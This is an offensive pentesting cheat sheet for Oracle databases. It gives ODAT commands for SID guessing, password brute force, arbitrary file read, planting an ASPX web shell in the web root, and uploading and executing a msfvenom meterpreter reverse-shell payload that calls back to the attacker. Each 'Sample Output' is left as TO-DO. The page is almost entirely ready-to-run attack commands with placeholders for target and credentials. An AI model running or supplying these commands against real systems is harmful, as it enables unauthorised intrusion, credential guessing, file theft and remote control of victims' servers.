Usage Tips:
- Click on a keyword to enable inline editing.
- Click inside a code block to copy (excludes comments).
- Use the button to view examples.
- Click outside to collapse all examples.
Tools
# Install
sudo apt install oracle-instantclient-sqlplus
Sample Output:
TO-DO# export LD_LIBRARY_PATH
export LD_LIBRARY_PATH=/usr/lib/oracle/19.6/client64/lib${LD_LIBRARY_PATH:+:$LD_LIBRARY_PATH}
Sample Output:
TO-DO# Check
sqlplus -V
Sample Output:
TO-DO# Install
sudo apt install odat
Sample Output:
TO-DO# Check
odat --version
Sample Output:
TO-DORef: Download ODAT
Enum
# SID enum (You only need one)
odat sidguesser -s <TARGET>
Sample Output:
TO-DO# User/Password brute force
odat passwordguesser -s <TARGET> -d <SID> --accounts-file accounts.txt
Sample Output:
TO-DO# Run all checks with creds as sysdba
odat all -s <TARGET> -U '<USER>' -P '<PASSWORD>' -d <SID> --sysdba
Sample Output:
TO-DOGeneral
# Export everytime or add to ~/.zshrc
export LD_LIBRARY_PATH=/usr/lib/oracle/19.6/client64/lib${LD_LIBRARY_PATH:+:$LD_LIBRARY_PATH}
Sample Output:
TO-DO# Connect
sqlplus '<USER>/<PASSWORD>@<TARGET>:1521/<SID>'
Sample Output:
TO-DO# Connect as sysdba (sudo)
sqlplus '<USER>/<PASSWORD>@<TARGET>:1521/<SID>' as sysdba
Sample Output:
TO-DO# Check privilege
select * from user_role_privs;
Sample Output:
TO-DOAbuse #1: Arbitrary Read
odat ctxsys -s <TARGET> -U '<USER>' -P '<PASSWORD>' -d <SID> --sysdba --getFile c:\\users\\administrator\\desktop\\file.txt
Sample Output:
TO-DOAbuse #2: Upload File to RCE
odat dbmsadvisor -s <TARGET> -U '<USER>' -P '<PASSWORD>' -d <SID> --sysdba --putFile C:\\inetpub\\wwwroot cmdasp.aspx /usr/share/webshells/aspx/cmdasp.aspx
Sample Output:
TO-DOAbuse #3: Execute binary to RCE
# Create a malicious exe
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<LOCAL_IP> LPORT=<LOCAL_PORT> -f exe -o revshell.exe
Sample Output:
TO-DO# Upload
odat utlfile -s <TARGET> -U '<USER>' -P '<PASSWORD>' -d <SID> --sysdba --putFile C:\\ProgramData revshell.exe revshell.exe
Sample Output:
TO-DO# Execute
odat externaltable -s <TARGET> -U '<USER>' -P '<PASSWORD>' -d <SID> --sysdba --exec C:\\ProgramData revshell.exe
Sample Output:
TO-DO